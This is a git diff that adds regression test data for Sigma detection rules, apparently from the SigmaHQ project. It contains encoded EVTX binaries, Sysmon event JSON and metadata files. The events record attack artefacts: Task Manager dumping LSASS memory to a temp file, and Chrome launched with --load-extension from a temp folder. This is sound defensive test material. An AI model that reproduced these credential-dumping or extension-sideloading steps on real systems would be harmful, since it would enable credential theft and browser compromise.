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 Uqj8}t(@aJO^f93~5Y>nOKS){V`Tzg` literal 0 HcmV?d00001 diff --git a/regression_data/windows/file/file_event/file_event_win_taskmgr_lsass_dump/69ca12af-119d-44ed-b50f-a47af0ebc364.json b/regression_data/windows/file/file_event/file_event_win_taskmgr_lsass_dump/69ca12af-119d-44ed-b50f-a47af0ebc364.json new file mode 100644 index 000000000..811d5f7a9 --- /dev/null +++ b/regression_data/windows/file/file_event/file_event_win_taskmgr_lsass_dump/69ca12af-119d-44ed-b50f-a47af0ebc364.json @@ -0,0 +1,51 @@ +{ + "Event": { + "#attributes": { + "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" + }, + "System": { + "Provider": { + "#attributes": { + "Name": "Microsoft-Windows-Sysmon", + "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" + } + }, + "EventID": 11, + "Version": 2, + "Level": 4, + "Task": 11, + "Opcode": 0, + "Keywords": "0x8000000000000000", + "TimeCreated": { + "#attributes": { + "SystemTime": "2025-10-24T23:50:20.590884Z" + } + }, + "EventRecordID": 53968, + "Correlation": null, + "Execution": { + "#attributes": { + "ProcessID": 3308, + "ThreadID": 4008 + } + }, + "Channel": "Microsoft-Windows-Sysmon/Operational", + "Computer": "ar-win-dc.attackrange.local", + "Security": { + "#attributes": { + "UserID": "S-1-5-18" + } + } + }, + "EventData": { + "RuleName": "-", + "UtcTime": "2025-10-24 23:50:20.576", + "ProcessGuid": "5AA13A44-10B3-68FC-4E1E-000000004002", + "ProcessId": 2956, + "Image": "C:\\Windows\\system32\\taskmgr.exe", + "TargetFilename": "C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\lsass.DMP", + "CreationUtcTime": "2025-10-24 23:50:20.576", + "User": "ATTACKRANGE\\Administrator" + } + } +} diff --git a/regression_data/windows/file/file_event/file_event_win_taskmgr_lsass_dump/info.yml b/regression_data/windows/file/file_event/file_event_win_taskmgr_lsass_dump/info.yml new file mode 100644 index 000000000..13c91674b --- /dev/null +++ b/regression_data/windows/file/file_event/file_event_win_taskmgr_lsass_dump/info.yml @@ -0,0 +1,13 @@ +id: 55db307d-4a36-4594-bea8-7d114714d3b4 +description: N/A +date: 2025-10-24 +author: SigmaHQ Team +rule_metadata: + - id: 69ca12af-119d-44ed-b50f-a47af0ebc364 + title: LSASS Process Memory Dump Creation Via Taskmgr.EXE +regression_tests_info: + - name: Positive Detection Test + type: evtx + provider: Microsoft-Windows-Sysmon + match_count: 1 + path: regression_data/windows/file/file_event/file_event_win_taskmgr_lsass_dump/69ca12af-119d-44ed-b50f-a47af0ebc364.evtx diff --git a/regression_data/windows/process_creation/proc_creation_win_browsers_chromium_headless_file_download/0e8cfe08-02c9-4815-a2f8-0d157b7ed33e.evtx b/regression_data/windows/process_creation/proc_creation_win_browsers_chromium_headless_file_download/0e8cfe08-02c9-4815-a2f8-0d157b7ed33e.evtx new file mode 100644 index 0000000000000000000000000000000000000000..56a66952d548d82613fb335b8c4f6fa85628f484 GIT binary patch literal 69632 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≤?{ctaA9dbJu_P@43C7hGF(#{3C1_Wynl~ zyvDfT8MA9`Ev}&LAw)A{nz?4e?b19b^CUWfQ^hhqJT-DRP4fQ)-ni>~sUAr3G|`8{ zb02K!#eE1?jkr>uv-V~kUF&q*Zp%1wKzUQWd;X7e+yi!9@IyD4EP=>0N}N4c9e<4Y zm3kCsAJ09B7;?UhcCPP)YO=XaU}ni_Wy0kEX4na=$zzc3ho(zwGV)P-D*blRWr@r3y=G@E7KUlpFB5(RA zT7SNq2Y!!~at#O=I2pm6$}|#(pc<1CyVroA>L2Rd*U;v=$eC|LYO~5fA|p z5CIVo0TB=Z5fA|p5CIVo0TB=Z5fA|p5CIVo0TB=Z5fA|p5CIVo0TB=Z5fA|p5CIVo z0TB=Z5fA|p5CIVo0TB=Z5fA|p5CIVo0TB=Z5fA|p5CIVo0TB=Z5fA|p5CIVo0TB=Z z5fA|p5CIVo0TB=Z5fA|p5CIVo0TB=Z5fA|p5CIVo0TB=Z5fA|p5CIVo0TB=Z5fA|p z5CIVo0TB=Z5fA|p5CIVo0TB=Z5fA|p5CIVo0TB=Z5fA|p5CIVo0TB=Z5fA|p5CIVo z0TB=Z5fA|p5CIVo0TB=Z5fA|p5CIVo0TB=Z5fA|p5CIVo0TB=Z5fA|p5CIVo0TB=Z z5fA|p5CIVo0TB=Z5fA|p5CIVo0TB=Z5fA|p5CIVo0TB=Z5fA|p5CIVo0TB=Z5fA|p q5CIVo0TB=Z5fA|p5CIVo0TB=Z5fA|p5CIVo0TB=Z5fFjx2>b^MfrtA5 literal 0 HcmV?d00001 diff --git a/regression_data/windows/process_creation/proc_creation_win_browsers_chromium_load_extension/88d6e60c-759d-4ac1-a447-c0f1466c2d21.json b/regression_data/windows/process_creation/proc_creation_win_browsers_chromium_load_extension/88d6e60c-759d-4ac1-a447-c0f1466c2d21.json new file mode 100644 index 000000000..aea7029d1 --- /dev/null +++ b/regression_data/windows/process_creation/proc_creation_win_browsers_chromium_load_extension/88d6e60c-759d-4ac1-a447-c0f1466c2d21.json @@ -0,0 +1,66 @@ +{ + "Event": { + "#attributes": { + "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" + }, + "System": { + "Provider": { + "#attributes": { + "Name": "Microsoft-Windows-Sysmon", + "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" + } + }, + "EventID": 1, + "Version": 5, + "Level": 4, + "Task": 1, + "Opcode": 0, + "Keywords": "0x8000000000000000", + "TimeCreated": { + "#attributes": { + "SystemTime": "2025-10-26T23:25:03.181097Z" + } + }, + "EventRecordID": 32923086, + "Correlation": null, + "Execution": { + "#attributes": { + "ProcessID": 3308, + "ThreadID": 4008 + } + }, + "Channel": "Microsoft-Windows-Sysmon/Operational", + "Computer": "ar-win-dc.attackrange.local", + "Security": { + "#attributes": { + "UserID": "S-1-5-18" + } + } + }, + "EventData": { + "RuleName": "-", + "UtcTime": "2025-10-26 23:25:03.169", + "ProcessGuid": "5AA13A44-ADCF-68FE-295E-000000004002", + "ProcessId": 4788, + "Image": "C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe", + "FileVersion": "141.0.7390.123", + "Description": "Google Chrome", + "Product": "Google Chrome", + "Company": "Google LLC", + "OriginalFileName": "chrome.exe", + "CommandLine": "\"C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe\" --load-extension=\"C:\\Users\\user\\AppData\\Local\\Temp\\HHe2lr\"", + "CurrentDirectory": "C:\\", + "User": "ATTACKRANGE\\Administrator", + "LogonGuid": "5AA13A44-568F-68FB-E39A-520000000000", + "LogonId": "0x529ae3", + "TerminalSessionId": 2, + "IntegrityLevel": "High", + "Hashes": "SHA1=F946FD910D1D2B6BF54DDD57FEBF5F066058BC5A,MD5=36E9DFE8CEAE9E88100C6BBD1550DEDD,SHA256=6A9CF74C9FA74C16EA6F26351FA5EF8CE11191DBBD5EEADCB2591904767B96B0,IMPHASH=3E82AE93B8102462DDA81604AF164E8E", + "ParentProcessGuid": "5AA13A44-0C90-68FC-BF1D-000000004002", + "ParentProcessId": 10048, + "ParentImage": "C:\\Windows\\System32\\cmd.exe", + "ParentCommandLine": "\"C:\\Windows\\system32\\cmd.exe\"", + "ParentUser": "ATTACKRANGE\\Administrator" + } + } +} diff --git a/regression_data/windows/process_creation/proc_creation_win_browsers_chromium_load_extension/info.yml b/regression_data/windows/process_creation/proc_creation_win_browsers_chromium_load_extension/info.yml new file mode 100644 index 000000000..48a2dca40 --- /dev/null +++ b/regression_data/windows/process_creation/proc_creation_win_browsers_chromium_load_extension/info.yml @@ -0,0 +1,12 @@ +id: e159e6ce-c717-4a38-af44-ff8c4f011c37 +description: N/A +date: 2025-10-24 +author: SigmaHQ Team +rule_metadata: + - id: 88d6e60c-759d-4ac1-a447-c0f1466c2d21 + title: Chromium Browser Instance Executed With Custom Extension +regression_tests_info: + - name: Positive Detection Test + type: evtx + provider: Microsoft-Windows-Sysmon + path: regression_data/windows/process_creation/proc_creation_win_browsers_chromium_load_extension/88d6e60c-759d-4ac1-a447-c0f1466c2d21.evtx diff --git a/regression_data/windows/process_creation/proc_creation_win_browsers_chromium_mockbin_abuse/1c526788-0abe-4713-862f-b520da5e5316.evtx b/regression_data/windows/process_creation/proc_creation_win_browsers_chromium_mockbin_abuse/1c526788-0abe-4713-862f-b520da5e5316.evtx new file mode 100644 index 0000000000000000000000000000000000000000..b078b6611dca3789b8e9c1b45061e1ff34392f6d GIT binary patch literal 69632 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 